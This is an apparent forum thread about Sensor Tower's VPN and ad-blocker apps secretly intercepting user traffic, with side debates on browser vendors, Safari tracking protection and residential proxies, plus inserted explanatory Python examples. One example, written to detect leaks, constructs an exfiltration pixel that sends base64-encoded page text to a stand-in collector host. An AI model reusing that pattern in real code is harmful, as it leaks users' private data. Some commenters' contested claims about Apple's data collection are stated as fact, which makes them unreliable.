This is literally one among many reasons (ha!) why I use Firefox. Every other browser vendor is a for-profit entity, and as such will limit good ad-blocking measures as Safari and Chrome have done recently with their new "security" policies.
This is also why I don't use a VPN I don't run (or certainly not one that hasn't been audited with a good reputation), and I certainly would never fucking dream of using a free VPN unless all the traffic over it is absolutely worthless.
... How many of these things install root certs where even after you've canceled your subscription you're still accepting their bullshit?
On the other hand, this could make for a hilarious experiment using adversarial neural networks to troll the assholes mining data from the VPNs.
"Every other browser vendor is a for-profit entity, ..."
Not the one that authored the text-only browser I am typing this from.
Whether Mozilla turns a profit or not makes little difference in this instance. Mozilla does not survive on donations from users. Its employees are not volunteers working for free to defend user privacy. Its generously compensated executives and staff need money from the online ad business, just like employees from the other browser vendors. If Mozilla stopped taking money from Google or some other online ad business partner, then Mozilla employees would lose their jobs.
Note I do not recommend using a text-only browser interactively for any sort of commercial or important online activity. I use it for recreational activities like reading HN and the websites posted here.
I used lynx many years ago in the early 90's. After switching to links, I would never intentionally use lynx again. It amazes me that people still mention lynx when the topic of text-only browsers comes up. I would be shocked if these people who recommend it are using it as their browser on a daily basis for decades.
> Every other browser vendor is a for-profit entity, and as such will limit good ad-blocking measures as Safari
I thought Safari introduced support for Content Blockers specifically to avoid ad blockers from phoning home and passing potentially sensitive information to the ad blocker's writer.
Lots of people then got quite cross that their favourite blocker had been blocked.
That is exactly the bullshit they want you to believe. Restricting your ability to install/modify software on your computer because bad software could harm you. You have been bamboozled.
... This entire discussion IS about bad software that DOES harm you, and you rag on the measures to specifically protect against something like that? What the heck?
Yes, I'm not saying there is no harmful software, I'm saying these kinds of "protections" are the wrong solution. The same people who blindly install any add-ons will also install any exe-files if the promising website tells them to, because the browser's add-on system does not provide the required mechanics. So the next step is to disallow exe-files. But of course you can let the exe-file get signed for a "small" fee...
I think, especially given events that’ve transpired since, Apple was fairly justified in not giving third party developers unfettered access to web pages and network requests running through the browser.
I am very glad that I can install an ad blocker on my phone and I don’t have to trust that it’s not going to mine and sell my data.
I haven’t been bamboozled, I’ve just made a different decision with a different set of trade offs than you.
The dramatically reduced incidence of various non-technical family members having to go to me or Geek Squad for yet another virus infection says otherwise.
Keep in mind that Apple gets paid a percentage of Google ad revenue made in Safari; just like how Mozilla gets paid a percentage of Google ad revenue made in Firefox.
Apple came up with a better way to mine your personal data through its Safari browser.
They introduced a feature (Intelligent Tracking Protection - ITP) that they claim blocks ads / trackers from tracking you online on the various sites that you visit.
A simplistic explanation:
Every time you visit a website with an ad or a tracker, it leaves a cookie on your browser that identifies you. You could block many of them by telling your browser to block cookies from third-party domains. This coupled with ad blockers is one effective way to tackle online tracking.
What Apple did was to deliberately take away this control from us and ask us to trust them to decide which cookie is allowed and which is not.
They REMOVED the feature that allowed us to block third-party cookies. So now you have only 2 options in Safari - allow ALL cookies or block all cookies. You cannot block all cookies as it breaks nearly all websites. Apple claims that you should allow websites to set cookies so it can research and find out which cookies track you. And so every time you visit a website and it sets a cookie, Apple collects this information "anonymously".
So in effect, this "privacy feature" is designed to let Apple know about every website you visit.
Of course, Apple claims all this data is anonymously stored (i.e. not tied to any of your personal information like Apple ID). (This idea of anonymous collection of data has already been debunked and proven false as it can be "deanonymised").
Second, Apple claims that its anti-tracking feature will not work in private browsing mode because private browsing mode doesn't save cookies once you close a tab. So in effect, Apple deliberately cripples private browsing mode, advocating that all its users use normal browsing mode (so that Apple, and others, can mine more data from its users).
Third, by taking away cookie control, Apple is now in full control of deciding which cookie can stay in the browser. This means that if you visit a website regularly, Apple will decide how its cookies should be treated, regardless of whether you want them deleted or not.
All in all, Apple's anti-tracking feature is just designed to give their competitors a harder time while giving Apple the ability to mine their users' data better and also taking control away from them.
Google researchers also found that Safari's anti-tracking feature was broken and quite weak:
> ... According to the Google researchers, the vulnerabilities left personal data exposed “because the ITP list implicitly stores information about the websites visited by the user”.
> ... The researchers also identified a flaw that allowed hackers to “create a persistent fingerprint that will follow the user around the web”, while others were able to reveal what individual users were searching for on search engine pages.
Apple claims to have fixed this. But the fact remains that the feature is still not quite effective because most online trackers have moved on to browser fingerprinting.
The developer of the popular ad-blocker uBlock Origin has also stated that Safari / webkit ad-blocking abilities leave a lot to be desired.
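An added example, not part of the thread, of the decision the post above describes when it says you could "block cookies from third-party domains": given the top-level page URL, the URL of the response (page, script, tracking pixel) that carried a Set-Cookie header, and the header itself, decide whether the cookie is first- or third-party and whether to keep it. The public-suffix list is a constructed, abbreviated stand-in for the real Public Suffix List, the sample URLs and cookies are constructed, and only the Domain attribute is considered.

```python
"""Added example (not from the thread): the first-party / third-party cookie
decision that a "block third-party cookies" browser setting makes.
Assumptions: a constructed, abbreviated public-suffix list stands in for
the real Public Suffix List; only the Domain attribute is considered."""
from urllib.parse import urlsplit

# Constructed, deliberately tiny stand-in for the Public Suffix List.
PUBLIC_SUFFIXES = {"com", "net", "org", "uk", "co.uk", "github.io"}


def registrable_domain(host: str) -> str:
    """Return the site (eTLD+1) of a hostname, e.g. a.b.example.co.uk -> example.co.uk.

    Scanning from the full name downward, the first suffix that matches is the
    longest one, which is the rule the Public Suffix List uses."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            # i == 0 means the host itself is a public suffix; there is no eTLD+1
            return ".".join(labels[max(i - 1, 0):])
    return ".".join(labels)


def parse_set_cookie(header: str) -> dict:
    """Minimal Set-Cookie parser: name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def cookie_decision(page_url: str, response_url: str, set_cookie: str,
                    block_third_party: bool = True) -> tuple:
    """Return ("accept" | "reject", reason) for one Set-Cookie header.

    page_url is the top-level document; response_url is the request (page,
    script, pixel, ...) whose response carried the header."""
    page_site = registrable_domain(urlsplit(page_url).hostname)
    resp_host = urlsplit(response_url).hostname.lower()
    cookie = parse_set_cookie(set_cookie)
    domain = cookie["attrs"].get("domain", "").lstrip(".").lower() or resp_host

    # RFC 6265 section 5.3: a Domain attribute must domain-match the response host,
    # otherwise the cookie is ignored (a pixel cannot set cookies for the page's site).
    if not (resp_host == domain or resp_host.endswith("." + domain)):
        return "reject", f"Domain={domain} does not match response host {resp_host}"
    if domain in PUBLIC_SUFFIXES:
        return "reject", f"Domain={domain} is a public suffix"

    cookie_site = registrable_domain(domain)
    if cookie_site != page_site:
        if block_third_party:
            return "reject", f"third-party cookie for {cookie_site} while on {page_site}"
        return "accept", f"third-party cookie for {cookie_site} allowed"
    return "accept", f"first-party cookie for {cookie_site}"


if __name__ == "__main__":
    # Constructed sample: a news page that loads one of its own scripts and one tracking pixel.
    page = "https://news.example.com/article/42"
    cases = [
        ("https://news.example.com/app.js", "sess=1; Domain=example.com; Secure; HttpOnly"),
        ("https://cdn.tracker.com/pixel.gif", "uid=abc123; Domain=tracker.com; Path=/"),
        ("https://cdn.tracker.com/pixel.gif", "uid=abc123; Domain=example.com"),
    ]
    for url, header in cases:
        print(url, "->", cookie_decision(page, url, header))
```

The third case shows why the domain-match check comes first: a tracker's response cannot smuggle a cookie onto the page's own site by naming it in the Domain attribute. The check is by site (eTLD+1), not by hostname, so `news.example.com` and `static.example.com` are the same party while `cdn.tracker.com` is not; a real implementation needs the full Public Suffix List for that comparison to be right.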
> So now you have only 2 option in Safari - allow ALL cookies or block all cookies.
Didn't they make blocking of 3rd party cookies the default? If I browse privately and look at the cookies on my machine by going to Prefs > Privacy > Manage Web Site Data, I don't see any cookies showing up after I've closed a page.
> ... How many of these things install root certs where even after you've canceled your subscription you're still accepting their bullshit?
It does seem like a bit of a flaw that removing the app on iOS doesn't automatically remove the profile such apps install: https://support.apple.com/en-au/HT205347
I'm pretty sure Apple will remove the VPN profile, which is why leaving a root certificate seems dangerous for users who don't know what they're for.
There can, of course, be legitimate uses for this tech. https://www.charlesproxy.com/documentation/ios/ or maybe opting out of certificate transparency reports, but they do seem like edge cases.
> It does seem like a bit of a flaw that removing the app on iOS doesn't automatically remove the profile such apps install
AFAIK only system apps can install profiles. These apps work by getting the user to install a separate profile via Safari.
> I'm pretty sure Apple will remove the VPN profile, which is why leaving a root certificate seems dangerous for users who don't know what they're for.
If these aren't enterprise profiles then Apple may not have an easy mechanism to block them (other than blocking their semantics).
Apple has a ton of variants of profiles, I keep expecting them to deprecate swaths of types/installation methods to help this be more understandable.
If Safari has a system back button to take me back to the app, it knows enough to include the “originating app” for the profile. Similarly it could create an association between the domain the profile is hosted on and the app. Finally, Apple could indeed change how profile installation works such that profiles need to be signed and associated with either an Enterprise account or a per-app developer account, to make deleting such apps-with-profiles in future more robust. Lastly, like privacy warnings, Apple could say that Certificate Owner has installed a root certificate to monitor all communications and let you opt out. That would be ideal, to deprecate existing methods and even more explicitly support app-based root certificates in their privacy warning flows.
Being a foundation does not entirely remove the incentives to do shady shit, it just reduces them a bit. Look at ISOC's sale of .org or for Mozilla when they gave Cliqz the browsing histories of a random sample of all German Firefox users.
The Mozilla Corporation is wholly owned by the Mozilla Foundation and bound by its charter. The split structure is an artifact of corporations being better-understood legal entities than foundations, and thus easier to deal with in various situations (hiring, contracts, etc). See also the Signal Foundation and Signal Messenger, LLC.
This was an experiment (2017), not sure what became of it.
> Less than one percent of users in Germany installing Firefox from our main download page will receive a version of Firefox with Cliqz recommendations enabled out of the box.
> This experiment also includes the data collection tool Cliqz uses to build its recommendation engine. Users who receive a version of Firefox with Cliqz will have their browsing activity sent to Cliqz servers, including the URLs of pages they visit. Cliqz uses several techniques to attempt to remove sensitive information from this browsing data before it is sent from Firefox. Cliqz does not build browsing profiles for individual users and discards the user’s IP address once the data is collected.
Firefox is like that really ugly flower that blooms once every hundred years, they leapfrog the competition briefly and then eventually degrade back to being crap for regular users. I'm aware of the technical politics around what causes this but that only really matters for people who choose browsers based on cyber politics. Quantum was good for six months, now we're back to the same situation where almost everyone outside the tech bubble is using Chrome.
You'd think that maybe this would cause them to exercise some strategy, like rushing to conquer mobile since Chrome's mobile ui is trash, but nope. Hell, Brave of all things is doing better at mobile than Firefox.
I install Firefox + uBlock Origin + HTTPS Everywhere whenever I can, whether it's friends, family or colleagues. After a bit of explanation they usually understand the matter. It's all about user education.
I have had zero "relapses" back to safari or chrome so far, they all seem to like browsing without ads and tracking.
Indeed. It only takes about 45 seconds to remove almost all ads from someone's online experience. Not getting ads on YouTube is by itself a game changer for a lot of people. Many people happily pay for blessings from monks and priests that take about the same time, except this actually improves lives in a concrete way and is free. Spread the gospel of FOSS
>Firefox is like that really ugly flower that blooms once every hundred years, they leapfrog the competition briefly and then eventually degrade back to being crap for regular users.
It's hard to move browsers permanently if you're not prepared. I moved to FF Quantum for a bit, but had to regularly open Chrome to get passwords etc. And the Chrome assholes removed the password export (or at least I could not for the life of me get it to work at the time)
I ended up going back for a bit and added a password manager, and now I can move between browsers easily - but as I said, it's not always straightforward, especially for _most_ non-tech users.
I distinctly recall the option to manually import passwords being harder to find (solution is to either import them from another browser or enable a flag to import passwords from a CSV file).
> It's hard to move browsers permanently if you're not prepared.
I find it rather easy, at least in my case. Passwords are all managed via a password manager, I barely use bookmarks, so most of the work is re-installing and configuring a few plugins, which I also don't use many of
I'm waiting for news about OneTrust, the company handling GDPR/CCPA cookie management for a ziiilllion sites. I can't imagine they aren't getting in on this action.
Ahh but the users of the VPNs apps have no idea that Sensor Tower is behind the app and collecting and selling their data.
It might be in the terms of service and briefly shown to them, but in the literal, practical sense, the users actually do not know! It is without their knowledge.
This is basically a MITM proxy, which I'd say is really essential for true adblocking and content filtering, especially on the locked-down mobile platforms and with the rise of HTTPS. The question is then who runs the proxy and whether you trust them.
I've been doing the same with Proxomitron for years, although in that case I run the proxy, I certainly trust myself, and --- I'm not sure about whether these apps even have such a feature --- I can modify how/what it filters/blocks at any time.
This is generally possible (With how Wireguard-based VPNs currently work) but Apple would much rather you use the Safari content blocker API for defining rules.
I use two devices. The first runs a kernel+userland I can edit and acts as the gateway/AP and DNS server for the second, which runs some commercially-motivated, "locked-down" consumer OS.
What hardware are you using for the gateway/AP? What's the backhaul, a USB LTE modem? Do you carry it in a handbag with a USB battery pack?
I've been thinking about doing this and scrapping all but one of my data plans, and having a robust default-deny whitelist of allowed IPs/netblocks/hostnames on the phone vlan/ssid, but haven't worked out all the details yet.
The gateway is a small form-factor computer with a rechargeable battery, e.g., a netbook or laptop. The AP is a SBC that the preferred kernel, e.g., NetBSD, OpenBSD, Linux, etc., supports. The AP draws power from the gateway's battery via USB.
Regarding LTE modems, I do not use a data plan on "locked-down" mobile devices for personal use. Somehow I have been able to survive on WiFi alone.
So you carry around a laptop powered on all day when you are out? What about battery life?
I’m looking at something like a raspberry pi zero, using the built in wifi to serve as an AP, powered from a large-ish USB battery pack, something that could run 18h+, with a USB LTE modem. Ideally I could get it small enough to strap to an ankle or something so I don’t need to bring a bag.
You load a list of rules into it, and the only thing it is allowed to do is make a classification of where the URL should go (if you're paranoid, make this classification strictly binary). It cannot write any state out, nor connect to the internet itself.
It's a solution for some situations, but not the one userbinator was talking about.
The problem here is needing to trust the filter program. Moving code into a sandbox doesn't help, because you still need an app outside the sandbox to make it actually filter, and the problem is not being able to trust an app.
I mean, you really can't trust that the app just isn't a dud and does nothing. But with sandboxing you can prevent the app from reporting your browsing history.
You have X inside a sandbox. It has the filtering logic, and can't report home. Cool.
But you need Y outside the sandbox so that your content actually gets filtered. Without Y, your "filtering app" does nothing. You need code that is outside the sandbox.
But how do we set up Y? In the context of a mobile device, Y would have to be a VPN app.
But the original problem is that we can't trust VPN apps to do what they say.
So even though you moved the actual filtering logic into X, and put it in a secure sandbox, you didn't solve the problem of needing to trust an app.
(And "put Y into the trusted OS" is not a valid solution toward getting filtering on "locked-down mobile platforms".)
Again, you can't trust that the app actually does filtering, because as you said the filter list is loaded and evaluated by code that has no obligation to do this. But it can't track your internet browsing because the component that could, the VPN extension, is inside a sandbox.
Interesting! So what you're really saying is that a VPN isn't needed. But this function only works on "supervised" devices. That's a pretty severe limitation.
It has to be able to take the web content, manipulate it to remove the stuff it is trying to block, and then return it to the browser... what is to stop if from returning content with image tags with sensitive data encoded in the url? The browser will have to load the content to display.
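The exfiltration channel the comment above describes, with the check a practitioner would run against it, as an added example that is not part of the thread: a filtering proxy that rewrites HTML can append a resource (an image, a script) whose URL carries page content encoded in the query string, and the browser leaks it simply by fetching that URL. Diffing the set of hosts the original and the rewritten page make the browser contact, and flagging auto-fetched URLs with unusually long query strings, catches the crude form of this. The two sample pages and the collector hostname are constructed.

```python
"""Added example (not from the thread): detect page content being smuggled out
through resources injected by a rewriting proxy. Sample pages are constructed;
collector.example.net is a hypothetical exfiltration host."""
import base64
from html.parser import HTMLParser
from urllib.parse import urlsplit

# (tag, attribute) pairs whose value the browser fetches without user interaction.
FETCH_ATTRS = {
    ("img", "src"), ("script", "src"), ("iframe", "src"), ("link", "href"),
    ("source", "src"), ("video", "src"), ("audio", "src"), ("video", "poster"),
}


class ResourceCollector(HTMLParser):
    """Collect every URL the page would auto-fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in FETCH_ATTRS and value:
                self.urls.append(value.strip())


def fetched_urls(html: str) -> list:
    parser = ResourceCollector()
    parser.feed(html)
    parser.close()
    return parser.urls


def resource_hosts(html: str) -> set:
    """Hostnames the page makes the browser contact (relative URLs have none)."""
    hosts = set()
    for url in fetched_urls(html):
        host = urlsplit(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def injected_hosts(original_html: str, filtered_html: str) -> set:
    """Hosts present after filtering that the original page never referenced."""
    return resource_hosts(filtered_html) - resource_hosts(original_html)


def long_query_urls(html: str, max_query_len: int = 40) -> list:
    """Auto-fetched URLs with an unusually long query string, the natural place
    to stuff encoded page content."""
    return [u for u in fetched_urls(html) if len(urlsplit(u).query) > max_query_len]


# Constructed sample: what the proxy received from the site ...
ORIGINAL = """<html><body>
<img src="https://static.example.com/logo.png">
<script src="https://ads.adnetwork.example/ad.js"></script>
<p>Balance: 4,211.07 (alice@example.com)</p>
</body></html>"""

# ... and what it handed to the browser. The "filter" did remove the ad script,
# but it also appended a 1x1 pixel whose query string carries the page text base64-encoded.
_LEAK = base64.urlsafe_b64encode(b"Balance: 4,211.07 (alice@example.com)").decode()
FILTERED = f"""<html><body>
<img src="https://static.example.com/logo.png">
<p>Balance: 4,211.07 (alice@example.com)</p>
<img src="https://collector.example.net/p.gif?d={_LEAK}" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    print("removed hosts :", resource_hosts(ORIGINAL) - resource_hosts(FILTERED))
    print("injected hosts:", injected_hosts(ORIGINAL, FILTERED))
    print("long queries  :", long_query_urls(FILTERED))
```

Two caveats. The host diff only sees resources that were not on the page before; a filter that points at a host the page already loads from, or that hides the data in a CSS `url()` or a DNS-prefetch hint, passes it, which is why the query-length check is there as a second, independent signal. And neither check sees what the proxy sends over its own connection, which is the larger problem this thread is about.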
It's from an era when software was largely not ad-supported nor infused with "telemetry", and written by one person who never "sold out" (and sadly passed away long ago), so I trust it far more than all the shady "privacy" services today. It's been around long enough that many others have reverse-engineered and analysed it substantially, understanding it enough to make patches to improve and fix, as well as near-equivalents. Look up "Proxydomo" if you want to go down that rabbit hole...
Oxylabs and Luminati are both residential proxy networks.
Hola is a VPN that sells access to Luminati.
NordVPN is a VPN that does not sell access to anyone. It is not sending anyone else's data through your connection. There's an accusation that it shares ownership with Oxylabs, and that's about it. NordVPN might be buying, not selling, residential proxy access from someone, but it's very unclear if that's true and either way doesn't have a negative impact on their customers.
That is an accusation that Nord or third party partners is turning devices into residential proxies.
It includes a direct quote from Nord on page 5 that says they buy access to IPs, and that the individuals they buy from are "fully aware of the purpose and receive a reward for the traffic sent and received".
Even if you think the "fully aware" part is a lie, I don't think there's any reason to think the part about buying it is a lie.
Even the worst version of a VPN buying IPs from some shady dealer is very different from secretly putting data on their own users' connections. It remains quite misleading to write "oxylabs (NordVPN), luminati (Holla)", implying that Nord is doing the same thing as Hola, of turning their own users into proxies.
A snippet from the article on the residential IP's:
"Furthermore, we conducted realtime device fingerprinting when we captured each IP address. And we have successfully identified the device type and vendor information for 547,497 IP addresses. What surprised us is that 237,029 of them turned out to be IoT systems, such as web camera, DVR, and printer."
They do far more than simply install backdoors for residential proxy networks. They also capture and resell your entire http(s) request history via their mitm. That's every single HTTP request every single app on your phone makes. It's a gold mine of information. They also sell profiles of exactly which apps you have installed on your phone, how often you're using each, and geolocation data if they get that permission.
Avast recently shutdown their subsidiary Jumpshot [1] who was doing similar. They were intercepting desktop traffic through their anti-virus software and browser plugins, and then selling your complete browsing history on a per-user (don't worry it was "anonymized" /s) to anyone willing to pay. Mostly to corporations, marketing platforms, and hedge funds.
Sensor Tower is doing the precisely the same thing for the same audience.
Does this break "California Consumer Privacy Act" of 2020?
As far as I know, companies are now legally obligated to give California residents the opportunity to see how their personal information is being tracked, how it's being sold, and how to opt out.
I've built more than one VPN network over the years - and I don't use the ones I built. My philosophy has always been that I can't trust the network after I no longer own it - and if the code isn't open.
The hard reality is that you have no way of knowing what's being logged if you don't have full access to the servers. I've always pushed for leaving VPN servers on operating systems running in read-only, on read-only disks, and open to the world (i.e customers who log in). It's one of the best forms of real transparency that I can think of.
> “ Apple and Google restrict root certificate privileges due to the security risk to users. Sensor Tower’s apps bypass the restrictions by prompting users to install a certificate through an external website after an app is downloaded.”
Seems like it will be an open and shut case, quickly banning the apps and hopefully Sensor Tower entirely, especially given the other details of the article explaining they’ve already banned apps from Sensor Tower for previous violations.
What is current best-practice ad blocker for iOS Safari? AdGuard? Ad-Blocker Pro? I’ve tried Firefox but besides their tracker blocking ads are still prevalent.
Sensor Tower is a mobile intelligence tool. Correct me if I am missing something, but what is the big deal here?
And when you use free apps, obviously they sell your data (or with a high chance), they are not charities. But in return, you get hassle-free ad-blocking or VPN. It looks like a fair deal to me. Or you can find a good one that will be expensive, or do it yourself (paying the same or more, just with your time).
And there is a huge difference between what they can do and what they actually do.
In coffee shops and other places, surveillance systems can be used to steal your passwords and logins etc. But I strongly suspect each and every one of us has entered their personal details while being recorded by a surveillance system many times. Or just in a public place where someone can see, etc.
How about the huge difference of knowing that you give away your data and not knowing? There is nothing "fair" about it and just the fact that they are now gone from the stores should...I don't know...maybe make you think about that a bit?
PS: just because there are worse situations, doesn't make this a good one.
I meant general practice done legally, e.g. stating this in their policy and showing when you run the app for the first time that it will sell their not personal data in exchange for free service.
The concept is fair as some are willing to pay with money, some are ok to pay with their data. Hiding the fact that you will sell data obviously deserves the punishment.
I 100% agree with you - but people tend to ignore "privacy" if something is free.
I was just talking with a colleague of mine who is in this "privacy is important" camp. But he is using mail tracker from hunter.io (since it is free).
It was really hard to explain to him that the company which allows you to "Find the email address of any professional" is giving the mail tracker away for free in order to collect more data (in their defense, they clearly say so in their privacy policy and you can opt out of the "sale" of personal information).